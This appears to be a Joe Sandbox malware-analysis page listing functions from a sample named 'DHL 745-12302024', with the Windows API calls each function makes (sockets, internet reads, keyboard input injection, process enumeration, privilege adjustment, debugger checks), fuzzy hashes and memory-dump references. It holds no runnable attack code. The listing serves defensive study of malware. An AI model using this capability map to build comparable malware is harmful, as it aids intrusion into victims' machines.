Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: f2d64750f105090f63ef38b8e525a3f4780132edb07917eddefd7380e963a692
Instruction ID: 751f0ef9dff28015fad4c3d214bdc0dcbf6561dd1ad8925a66beffc45e3cbb3f
Opcode Fuzzy Hash: f2d64750f105090f63ef38b8e525a3f4780132edb07917eddefd7380e963a692
Instruction Fuzzy Hash: DE41517190420AAFCF54DFA4CA49AEFBBB8EF05310F144156E816A72A1EB30DE45DF61

Function 00A7997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00A79BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A79BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 00A79A4E
GetSysColor.USER32(0000000F), ref: 00A79B23
SetBkColor.GDI32(?,00000000), ref: 00A79B36

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 60707af267198312de4dae69c89218e4ed57470f2ce93d27acb457d2aa2583f6
Instruction ID: 8df097d06d52ec221599227b574955142154234688607fbd95d4ffe3a23e136f
Opcode Fuzzy Hash: 60707af267198312de4dae69c89218e4ed57470f2ce93d27acb457d2aa2583f6
Instruction Fuzzy Hash: FCA13A70109404AEE724EB7C8D58EBF36ADDBC2380F25C21BF10AC6696CE659D42D376

Function 00AE1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00AE304E: inet_addr.WSOCK32(?), ref: 00AE307A
Part of subcall function 00AE304E: _wcslen.LIBCMT ref: 00AE309B

socket.WSOCK32(00000002,00000002,00000011), ref: 00AE185D
WSAGetLastError.WSOCK32 ref: 00AE1884
bind.WSOCK32(00000000,?,00000010), ref: 00AE18DB
WSAGetLastError.WSOCK32 ref: 00AE18E6
closesocket.WSOCK32(00000000), ref: 00AE1915

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: a14f48867185410a299a061054f2222a3c32abddd8d0444924fdd693c7a5c334
Instruction ID: 0cec0cebc0a2a8ee656344c7ce9d8c76f4c5251b731aa5762bc69d42556a436a
Opcode Fuzzy Hash: a14f48867185410a299a061054f2222a3c32abddd8d0444924fdd693c7a5c334
Instruction Fuzzy Hash: 1D51AF71A00210AFDB10EF65C986F6A77E5AB44718F088498F94A9F3D3D771AD42CBE1

Function 00A68060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

ERCP, xrefs: 00A6813C
VUUU, xrefs: 00AA5DF0
VUUU, xrefs: 00A683FA
VUUU, xrefs: 00A683E8
VUUU, xrefs: 00A6843C

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 9797b1e75f4f83b9bf9e121c2740b0df51a1c58750dc39ac16f13236f8f72776
Instruction ID: d99bd237bf294ed0da69a22ff64da648f029eab5a648b552c7e7ea9a78e993b9
Opcode Fuzzy Hash: 9797b1e75f4f83b9bf9e121c2740b0df51a1c58750dc39ac16f13236f8f72776
Instruction Fuzzy Hash: 37A29274E0061ACBDF24CF68C9407EDB7B5BF55310F2482AAE815AB285EB749D81CF94

Function 00AEA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00AEA6AC
Process32FirstW.KERNEL32(00000000,?), ref: 00AEA6BA

Part of subcall function 00A69CB3: _wcslen.LIBCMT ref: 00A69CBD

Process32NextW.KERNEL32(00000000,?), ref: 00AEA79C
CloseHandle.KERNEL32(00000000), ref: 00AEA7AB

Part of subcall function 00A7CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00AA3303,?), ref: 00A7CE8A

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 7fe8b8a0f331ac10677ca7c83741df4396d8937e1431d05355e5fed10c6a3352
Instruction ID: 5919d9af691aad5a996359ddf8e575bb1c100059b492f47cd5c68c80897ae8f9
Opcode Fuzzy Hash: 7fe8b8a0f331ac10677ca7c83741df4396d8937e1431d05355e5fed10c6a3352
Instruction Fuzzy Hash: 6F513B71508340AFD710EF65C986A6BBBF8FF99754F00891DF58997291EB30E904CB92

Function 00ACAA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00ACAAAC
SetKeyboardState.USER32(00000080), ref: 00ACAAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00ACAB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00ACAB88

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 451b1d7ef4703476dceafe8221d248f34632006ed82d1acb29ce85f823241b9a
Instruction ID: d00b61a803003741c55b1556b29b1350e4c2cf7c55859ed420d0ff13974d2064
Opcode Fuzzy Hash: 451b1d7ef4703476dceafe8221d248f34632006ed82d1acb29ce85f823241b9a
Instruction Fuzzy Hash: 09310570A8020CAEEF35CBA9CC05FFA7BB6AB64324F05421EF185961D1D7758D81C762

Function 00ADCE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 00ADCE89
GetLastError.KERNEL32(?,00000000), ref: 00ADCEEA
SetEvent.KERNEL32(?,?,00000000), ref: 00ADCEFE

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 5359d71f855288a7a54c29e32c627306a025ef656808124dd5d4473f1b9717b0
Instruction ID: 4a03e2810ac95ea26cebf6af17c316b19d15381402d44c6132c6e2ce29d27b6c
Opcode Fuzzy Hash: 5359d71f855288a7a54c29e32c627306a025ef656808124dd5d4473f1b9717b0
Instruction Fuzzy Hash: 4021AFB1500306ABDB20DFA6CA49BA7B7FCEB40364F50441EE546D2251EB70EE05DB50

Function 00ACDBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00AA5222), ref: 00ACDBCE
GetFileAttributesW.KERNEL32(?), ref: 00ACDBDD
FindFirstFileW.KERNEL32(?,?), ref: 00ACDBEE
FindClose.KERNEL32(00000000), ref: 00ACDBFA

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: d6d06b0cf5cbb0fcd4d7c9db0ff3a43d4fe56e966e10d2ed8298c9814cd84d2c
Instruction ID: 469a6193c3f055f418d3cef693c7ecd1d4bae6b1757f0bc221bbbea574c89e9e
Opcode Fuzzy Hash: d6d06b0cf5cbb0fcd4d7c9db0ff3a43d4fe56e966e10d2ed8298c9814cd84d2c
Instruction Fuzzy Hash: C2F0A03081891867C220ABF8AE0D9BA376C9E01334B10471AF836C20E0EBB06956C695

Function 00AC8298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00AC82AA

Strings

|, xrefs: 00AC82DA
(, xrefs: 00AC82F0

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 2c18909fdd4f616b99e2e6f9e2889911eca7b73a92bd74a376dd50db75a04087
Instruction ID: 68f4387f3a6bea0e4274415a976179d224249c357541c51296636732416af1cc
Opcode Fuzzy Hash: 2c18909fdd4f616b99e2e6f9e2889911eca7b73a92bd74a376dd50db75a04087
Instruction Fuzzy Hash: 59322375A006059FCB28CF59C480E6AB7F0FF48710B16C56EE49ADB7A1EB74E981CB40

Function 00AD5C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00AD5CC1
FindNextFileW.KERNEL32(00000000,?), ref: 00AD5D17
FindClose.KERNEL32(?), ref: 00AD5D5F

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: a0ad42bddeeb73f96437a4868e405e0e153b1831c8209f16cc031fda00ff96d0
Instruction ID: 2d99dc377e2b2079ba345a92c590b1d1a493254b173cbc42223d67aff520ceaf
Opcode Fuzzy Hash: a0ad42bddeeb73f96437a4868e405e0e153b1831c8209f16cc031fda00ff96d0
Instruction Fuzzy Hash: F2518A34A046019FC714DF68C494A96B7F5FF49324F14855EE99A8B3A1DB30E905CFA1

Function 00A92622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00A9271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A92724
UnhandledExceptionFilter.KERNEL32(?), ref: 00A92731

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 2592a56670a607ebfe7591c4eec1eec6b4bcf0056c623c084b9d0aa29ba89bb7
Instruction ID: 0fd99a8154662e7edf48071216fa33faeb759a091c3d1702c5d41334899dbc10
Opcode Fuzzy Hash: 2592a56670a607ebfe7591c4eec1eec6b4bcf0056c623c084b9d0aa29ba89bb7
Instruction Fuzzy Hash: AA31C47490121CABCB21DF68DD88B9DBBB8AF08310F5041EAE41CA7260E7309F858F44

Function 00AD51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00AD51DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00AD5238
SetErrorMode.KERNEL32(00000000), ref: 00AD52A1

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 1c034b49a6ad6f57a23c4bf6db074b41a4e3afd90cdb0f9acaf4549549449623
Instruction ID: b92363be282677d54214662f79686a3eb1cb01d87e9e5be33e170ee5dbda5407
Opcode Fuzzy Hash: 1c034b49a6ad6f57a23c4bf6db074b41a4e3afd90cdb0f9acaf4549549449623
Instruction Fuzzy Hash: A1313075A10518DFDB00DF94D984EEDBBB4FF49314F048099E846AB352DB31E85ACB91

Function 00AC16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00A7FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00A80668
Part of subcall function 00A7FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00A80685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AC170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AC173A
GetLastError.KERNEL32 ref: 00AC174A

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: de2712b622fb956793257fe8e5bd0770357f30308139ed32c8108051454b341b
Instruction ID: 1e00b16afe0ed7e74d6819d8cc034499aaeae36f60beb079e93ff109ae42ad3c
Opcode Fuzzy Hash: de2712b622fb956793257fe8e5bd0770357f30308139ed32c8108051454b341b
Instruction Fuzzy Hash: E211C1B2500308FFD728DF94DD86E6AB7B9EB04724B21C52EE05657242EB70BD42CA20

Function 00ACD5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00ACD608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00ACD645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00ACD650

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: c661d0dbe31eb796679c9be2b246dee7cda2344cf608618f79940e26cbf3f25d
Instruction ID: 1cf76616b8cdee1545280cfff1e4f3057e7a1afc1763e88c8d4b153fa5c1cff4
Opcode Fuzzy Hash: c661d0dbe31eb796679c9be2b246dee7cda2344cf608618f79940e26cbf3f25d
Instruction Fuzzy Hash: D2113075E05228BBDB108F959D45FAFBBBCEB45B60F104125F904E7290D6704A05CBA1

Function 00AC1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00AC168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00AC16A1
FreeSid.ADVAPI32(?), ref: 00AC16B1

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: d9b90e392383dcc58832b1346e6bcaba5123e11fa48ce202ba63ea5a1816e379
Instruction ID: 1d16de33ed32a1db6d6bc777e743e13bff130b37b7bbf115166a8cbff71cb19d
Opcode Fuzzy Hash: d9b90e392383dcc58832b1346e6bcaba5123e11fa48ce202ba63ea5a1816e379
Instruction Fuzzy Hash: FAF0447194030CFBDB00CFE08D89EAEBBBCEB08210F004864E500E2181E730AA059A50

Function 00A84CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00A928E9,?,00A84CBE,00A928E9,00B288B8,0000000C,00A84E15,00A928E9,00000002,00000000,?,00A928E9), ref: 00A84D09
TerminateProcess.KERNEL32(00000000,?,00A84CBE,00A928E9,00B288B8,0000000C,00A84E15,00A928E9,00000002,00000000,?,00A928E9), ref: 00A84D10
ExitProcess.KERNEL32 ref: 00A84D22

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: bf356d2ae5624eca8bd191c48078eb10c86359d958d354d7e032a4365af7d3dd
Instruction ID: 5d4298c4998bf2103a4d20d88ec91abae648fbdb003cc443ca95d14ca7f160f7
Opcode Fuzzy Hash: bf356d2ae5624eca8bd191c48078eb10c86359d958d354d7e032a4365af7d3dd
Instruction Fuzzy Hash: 4CE0B631000149AFCF12BF95DE09A69BB69EB45791B104114FD458A122CB35ED52DB80

Function 00A9C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 00A9C36C

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 53836be136d0d03f3e02b025273c8a065ebc7dc1f2a1d1dbbc0d4225e893c2f9
Instruction ID: 7e8150e8c5dd0fd56bcb11b56546b133c703b025b13d5c75d61f3582f7de8973
Opcode Fuzzy Hash: 53836be136d0d03f3e02b025273c8a065ebc7dc1f2a1d1dbbc0d4225e893c2f9
Instruction Fuzzy Hash: 98414972600619AFCF20AFB9CC48EBBB7F8EB84364F504269F905DB181E6709D41CB50

Function 00ABD27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00ABD28C

Strings

X64, xrefs: 00ABD2A8

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: c8e6b3de319f3a56f463561d37a6a10b7c1df5f89acb1b76b2e229ae970a9654
Instruction ID: c32bd1cdba3899a8c269c2e17630e06ac970694de427b5d055e9a71a8e3fc2a4
Opcode Fuzzy Hash: c8e6b3de319f3a56f463561d37a6a10b7c1df5f89acb1b76b2e229ae970a9654
Instruction Fuzzy Hash: 93D0C9B480116DEACB94CB90DC88DD9B37CBF04345F104155F106A2000DB30964A8F10

Function 00A8CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
